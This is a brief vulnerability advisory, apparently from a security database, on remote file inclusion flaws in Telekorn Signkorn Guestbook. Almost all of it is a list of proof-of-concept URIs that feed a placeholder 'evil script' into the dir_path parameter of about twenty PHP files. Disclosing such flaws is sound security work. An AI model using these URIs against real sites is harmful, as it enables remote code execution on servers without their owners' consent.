|
Telekorn Signkorn Guestbook Dir_Path Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a web client. The following proof-of-concept URIs are available: http://www.example.Com/[Script]/index.php?dir_path=[U r Evil Script] ; http://www.example.Com/[Script]/includes/functions.gb.php?dir_path=[U r Evil Script] ; http://www.example.Com/[Script]/includes/functions.admin.php?dir_path=[U r Evil Script] ; http://www.example.Com/[Script]/includes/admin.inc.php?dir_path=[U r Evil Script] ; http://www.example.Com/[Script]/help.php?dir_path=[U r Evil Script] ; http://www.example.Com/[Script]/smile.php?dir_path=[U r Evil Script] ; http://www.example.Com/[Script]/help/en/adminhelp0.php?dir_path=[U r Evil Script] ; http://www.example.Com/[Script]/help/en/adminhelp1.php?dir_path=[U r Evil Script] ; http://www.example.Com/[Script]/help/en/adminhelp2.php?dir_path=[U r Evil Script] ; http://www.example.Com/[Script]/help/en/adminhelp3.php?dir_path=[U r Evil Script] ; http://www.example.Com/[Script]/help/de/adminhelp0.php?dir_path=[U r Evil Script] ; http://www.example.Com/[Script]/help/de/adminhelp1.php?dir_path=[U r Evil Script] ; http://www.example.Com/[Script]/help/de/adminhelp2.php?dir_path=[U r Evil Script] ; http://www.example.Com/[Script]/help/de/adminhelp3.php?dir_path=[U r Evil Script] ; http://www.example.Com/[Script]/entry.php?dir_path=[U r Evil Script] ; http://www.example.Com/[Script]/admin/preview.php?dir_path=[U r Evil Script] ; http://www.example.Com/[Script]/admin/log.php?dir_path=[U r Evil Script] ; http://www.example.Com/[Script]/admin/index.php?dir_path=[U r Evil Script] ; http://www.example.Com/[Script]/admin/config.php?dir_path=[U r Evil Script] ; http://www.example.Com/[Script]/admin/admin.php?dir_path=[U r Evil Script] ; |
|
|
Privacy Statement |
